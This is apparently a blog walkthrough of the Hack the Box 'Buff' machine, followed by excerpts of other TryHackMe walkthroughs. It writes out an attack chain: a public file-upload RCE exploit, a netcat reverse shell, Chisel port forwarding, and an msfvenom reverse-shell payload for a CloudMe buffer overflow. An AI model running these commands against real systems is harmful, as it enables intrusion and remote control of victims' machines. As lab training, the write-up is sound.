Hack the Box - Buff - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Buff machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Buff machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.70.66

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

sudo nmap -T4 -p- 10.129.70.66  


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -sV -T4 -p8080 10.129.32.56


Let's check out the webservice on port 8080:

http://10.129.70.66:8080/


Taking a quick look at the links on the buttons, it seems like this is a PHP-based website. An interesting piece of info on the contact page, though:

http://10.129.70.66:8080/contact.php


If this management software is really at version 1.0, that means there's probably an exploit out for it.  Let's Google it:

Google search string: gym management software 1.0


And let's take a look at this first hit:

https://www.exploit-db.com/exploits/48506


Finding a Way In

This exploit looks like it's uploading webshell code by exploiting the Gym web-app's misconfigured upload.php file. Let's download it and figure out what arguments to pass it:

wget -O gymRCE.py https://www.exploit-db.com/raw/48506
gedit gymRCE.py




This seems like a pretty straightforward script. It creates a webshell on the server, then drops us into the webshell's command line. We just have to provide it with the path to the Gym Management Software installation.

python gymRCE.py http://10.129.70.66:8080/
whoami


Capturing the User Flag

We'll take this opportunity to capture the User flag for this system. Hack the Box Windows system User flags are usually located in a user's \Desktop directory:

type c:\users\shaun\desktop\user.txt


Before we continue, we should probably get ourselves a better shell.  This webshell, while functional, has a few limitation, so let's upload a Netcat binary to the target, and execute it to get ourselves a legit reverse shell.

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe nc.exe 


And the last thing to do before our upload is to setup an HTTP server using Python:

sudo python -m SimpleHTTPServer 80


Now we can use a Powershell command from the webshell to download the Netcat binary.

powershell -c iwr http://10.10.14.84/nc.exe -outf c:\xampp\htdocs\gym\upload\nc.exe
dir



Now to start a Netcat listener on our attacking system, then run Netcat from the Windows host to open our reverse shell:

sudo nc -nlvp 443

nc -e cmd 10.10.99.99 443




Foothold Enumeration

While enuemrating the system, we find an interesting binary on the shaun user's \Desktop directory.


We check to see if this software is running:

tasklist | findstr -i CloudMe


We do a quick Searchsploit on this software:

searchsploit cloudme


This exploit matches the version we saw in the \Desktop directory.  Let's take a look at it:

searchsploit -x 48389




So we see that this is a Buffer Overflow exploit, it targets the exact version of the software we suspect is running on the system, it's a local exploit that targets the service on port 8888, and it uses an Msfvenom-generated payload. Before we continue, let's make sure there's a service running on the Windows host's local port 8888:

netstat -ano | findstr -i listen


From what we know, the exploit is local, meaning we would have to use Python to run it on the Windows system, but the victim Windows system doesn't have Python installed. This isn't a problem, because we can utilize port-forwarding to connect the Windows host's localport 8888 to our attacking machine's localport 8888. We want the exploit to open a reverse shell to our attacking system, so we'll need to start another Netcat listener on our attacking system. We also need to generate our own payload for the exploit using Msfvenom, then use that payload to modify the exploit script. Let's start by copying the exploit script to our working directory, then renaming it for clarity:

searchsploit -m 48389
mv 48389.py HTBbuffBOF.py


Now to setup port-forwarding between our attacking machine and the Windows machine. We'll use a program called Chisel to do this. Chisel can be found at the following URL:

https://github.com/jpillora/chisel/

We install Chisel to our Kali system with the following command (after switching to the root user):

curl https://i.jpillora.com/chisel! | bash


The other part of using Chisel involves transferring a Chisel binary to the Windows machine. First, we download the latest Chisel binary to our attacking system, then unzip the file and rename it:

wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_windows_amd64.gz
gunzip chisel_1.7.6_windows_amd64.gz
mv chisel_1.7.6_windows_amd64 chisel.exe




Now we download the Chisel binary from our Windows host:

powershell -c iwr http://10.10.14.84/chisel.exe -outf c:\users\shaun\downloads\chisel.exe
dir


Now to startup our Chisel server from our Kali system:

chisel server -p 9000 --reverse


Now our Chisel server is listening on port 9000 and is waiting for incoming connections. To complete the connection, we run the Chisel client from the Windows system:

start chisel client 10.10.14.84:9000 R:8888:127.0.0.1:8888



Now our Chisel connection has been established, linking Kali's localport 8888 to the Windows localport 8888. Now to startup our new Netcat listener on our Kali machine:

sudo nc -nlvp 8080


We now generate Buffer Overflow payload code using Msfvenom:

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.99.99 LPORT=8080 -b ‘\x00\x0A\x0D’ -f python


And now to modify our exploit:

gedit HTBbuffBOF.py


We modify the payload portion of the exploit replacing it with the output of the Msfvenom command. This, unfortunately, turns the payload variable in the script into the buf variable, which already is named on Line 52. So we add an extra f to rename the Line 52 variable buff, then replace each instance of the word payload (on lines 50 and 52) with the word buf, then we replace buf, on Line 57, with buff. And then our exploit script is ready to go.

python HTBbuffBOF.py
whoami



Capturing the Root Flag

Root flags on Hack the Box Windows systems are usually located in the Administrator user's \Desktop directory:

type c:\users\administrator\desktop\root.txt


Summary

After initial scans, we found that the target system was running an insecure web-app on its website, leading to remote code execution through an misconfigured file upload function, leading to a foothold shell on the target. Enumeration of the system reveled that a vulnerable service was being run. We found a public exploit for this service and executed it, which resulted in a buffer overflow in the vulnerable service and a reverse shell being opened on our attacking system with elevated privileges, through which we captured our objective flag file.

Finish

Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more